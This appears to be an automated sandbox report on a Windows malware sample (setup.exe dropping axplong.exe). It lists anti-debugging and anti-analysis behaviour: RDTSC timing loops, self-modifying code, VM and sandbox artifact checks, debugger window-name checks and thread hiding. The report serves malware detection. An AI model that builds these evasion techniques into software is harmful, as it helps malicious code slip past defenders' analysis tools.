Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A07A5 second address: 47A07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE0B4522B20h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A07CD second address: 47A07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A07D1 second address: 47A07D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A07D7 second address: 47A080E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE0B4F44DCBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FE0B4F44DCBh 0x00000018 pop eax 0x00000019 mov ah, dh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A080E second address: 47A0837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE0B4522B25h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0837 second address: 47A083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A083D second address: 47A0841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0841 second address: 47A0871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE0B4F44DD1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0871 second address: 47A0877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0877 second address: 47A08C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 je 00007FE127F2A8BEh 0x00000019 pushad 0x0000001a mov si, 4093h 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushad 0x0000002b mov ax, di 0x0000002e movsx ebx, si 0x00000031 popad 0x00000032 mov di, ax 0x00000035 popad 0x00000036 mov ecx, esi 0x00000038 pushad 0x00000039 mov cl, 84h 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A08C1 second address: 47A0931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 je 00007FE1275085F2h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4522B27h 0x00000013 adc ah, FFFFFF8Eh 0x00000016 jmp 00007FE0B4522B29h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FE0B4522B20h 0x00000022 adc cl, 00000008h 0x00000025 jmp 00007FE0B4522B1Bh 0x0000002a popfd 0x0000002b popad 0x0000002c test byte ptr [77816968h], 00000002h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0931 second address: 47A0935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0935 second address: 47A093B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A093B second address: 47A0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0941 second address: 47A0990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE127508583h 0x0000000e jmp 00007FE0B4522B20h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 pushad 0x00000017 mov di, cx 0x0000001a call 00007FE0B4522B1Ah 0x0000001f push eax 0x00000020 pop ebx 0x00000021 pop ecx 0x00000022 popad 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE0B4522B29h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0990 second address: 47A09D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007FE0B4F44DCEh 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE0B4F44DD7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A09D0 second address: 47A09FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d mov dx, EC2Eh 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A09FD second address: 47A0A0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0A0B second address: 47A0A10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0A68 second address: 47A0A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0A6C second address: 47A0A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0A87 second address: 47A0A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0A9F second address: 47A0B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a call 00007FE0B4522B1Dh 0x0000000f pushfd 0x00000010 jmp 00007FE0B4522B20h 0x00000015 jmp 00007FE0B4522B25h 0x0000001a popfd 0x0000001b pop esi 0x0000001c mov ah, dl 0x0000001e popad 0x0000001f mov esp, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FE0B4522B24h 0x0000002a jmp 00007FE0B4522B25h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0E79 second address: 47B0E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0E7F second address: 47B0E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0E83 second address: 47B0EFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0B4F44DCFh 0x00000013 xor si, 9B2Eh 0x00000018 jmp 00007FE0B4F44DD9h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 movsx edx, ax 0x00000024 mov cl, D0h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FE0B4F44DD7h 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE0B4F44DD5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47B0B86 second address: 47B0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48307FC second address: 4830802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4830802 second address: 4830806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4830806 second address: 4830836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE0B4F44DCEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FE0B4F44DD0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4830836 second address: 483083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 483083C second address: 4830860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 10AE1E05h 0x00000011 jmp 00007FE0B4F44DD2h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820A69 second address: 4820A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820A6D second address: 4820A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820A73 second address: 4820A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B1Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48208F5 second address: 48208F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48208F9 second address: 48208FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48208FD second address: 4820903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820903 second address: 4820934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov ecx, 148E2F87h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007FE0B4522B1Ah 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820934 second address: 4820938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820938 second address: 482093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 482093C second address: 4820942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C02C4 second address: 47C02E6 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4522B27h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820CBA second address: 4820CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820CC0 second address: 4820CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820CC4 second address: 4820CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4F44DCBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820CDA second address: 4820D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FE0B4522B1Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE0B4522B1Bh 0x0000001a xor si, D15Eh 0x0000001f jmp 00007FE0B4522B29h 0x00000024 popfd 0x00000025 mov eax, 07527627h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820D25 second address: 4820D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE0B4F44DCEh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820D4F second address: 4820D55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820D55 second address: 4820DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE0B4F44DD0h 0x0000000b xor ah, FFFFFFE8h 0x0000000e jmp 00007FE0B4F44DCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+08h] 0x0000001a jmp 00007FE0B4F44DD6h 0x0000001f push 91FA1017h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FE0B4F44DD3h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820DB2 second address: 4820DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820DB6 second address: 4820DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4820E16 second address: 4820E30 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE0B4522B20h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E7C580 second address: E7C584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47D06D5 second address: 47D06EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47D06EB second address: 47D06EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47D06EF second address: 47D06F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47D06F5 second address: 47D06FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47D06FB second address: 47D06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: CBECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: CBEC2B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: E9B835 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: E8145C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: EFE86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: ADECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: ADEC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: CBB835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: CA145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: D1E86A instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04820C91 rdtsc 0_2_04820C91
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 413 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 8548 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7460 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7460 Thread sleep time: -94047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7468 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7468 Thread sleep time: -100050s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7440 Thread sleep count: 413 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7440 Thread sleep time: -12390000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7564 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7472 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7472 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep count: 81 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep time: -162081s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep count: 8548 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7452 Thread sleep time: -17104548s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: axplong.exe, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWS
Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.2499234685.000000000054A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.1335711226.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000004.00000002.1346750099.0000000000C71000.00000040.00000001.01000000.00000008.sdmp, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04820C91 rdtsc 0_2_04820C91
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AA645B mov eax, dword ptr fs:[00000030h] 13_2_00AA645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AAA1C2 mov eax, dword ptr fs:[00000030h] 13_2_00AAA1C2
Creates a process in suspended mode (likely to inject code)
